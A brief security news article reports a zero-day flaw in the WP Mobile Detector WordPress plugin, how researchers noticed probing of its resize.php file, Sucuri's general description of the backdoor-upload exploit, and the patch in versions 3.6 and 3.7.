WordPress most widely used Content Management System (CMS) mostly compromises because of the flaws in its plugins. Recently a WordPress plugin zero-day flaw has been detected, which already affected over 10,000 websites vulnerable to exploit.
Zero-Day Flaw in WordPress Plugin
Security researchers found a zero-day flaw in the WordPress plugin, WP Mobile Detector – a WordPress plugin that automatically detects standard and advanced mobile devices and displays a compatible WordPress mobile theme.
The zero-day flaw was first disclosed by the Plugin Vulnerabilities team on May 31 and doubted that over 10,000 websites may have affected with the flaw and vulnerable to exploit.
The security researchers became aware of a potential problem after receiving a HEAD request for a WP Mobile Detector file, blog/wp-content/plugins/wp-mobile-detector/resize.php, on a CMS domain which did not have the software installed.
The team investigated further and realized it was most likely that “someone was checking for the existence of the file before trying to exploit a vulnerability in the plugin.”
According to Sucuri, “the vulnerability is very easy to exploit, all the attacker needs to do is send a request to resize.php or timthumb.php, inside the plugin directory with the backdoor URL.”
The team behind WP Mobile Detector were informed of the zero-day flaw on 29 May and the wordpress.org Plugin Directory was notified two days later, leading to the temporary removal of the plugin.
On 31 May, the developers of the plugin patched the issue and the plugin has been restored. Users should update to either version 3.6 or 3.7, both of which are now no longer vulnerable to attacks exploiting the vulnerability.